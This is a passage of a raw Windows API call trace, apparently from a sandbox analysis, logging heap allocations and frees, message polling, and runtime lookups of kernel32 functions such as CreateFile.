(in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0043.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0043.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0043.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0043.441] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0043.441] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0043.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0043.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0043.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0043.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0043.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0043.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0043.442] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0043.442] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.442] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0043.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0043.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0043.442] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0043.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0043.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0043.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af408 [0043.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0043.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0043.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0043.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0043.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0043.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889988 [0043.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0043.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0043.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0043.443] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0043.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0043.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0043.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0043.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0043.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0043.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0043.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0043.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0043.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0043.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0043.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0043.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0043.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0043.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0043.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0043.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0043.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0043.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0043.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0043.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0043.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0043.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0043.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0043.445] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0043.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0043.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0043.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0043.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0043.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0043.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0043.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0043.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0043.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0043.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0043.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0043.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0043.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0043.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0043.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0043.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0043.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.447] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0043.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889670 [0043.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889670, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0043.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0043.448] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0043.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0043.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889670 [0043.448] 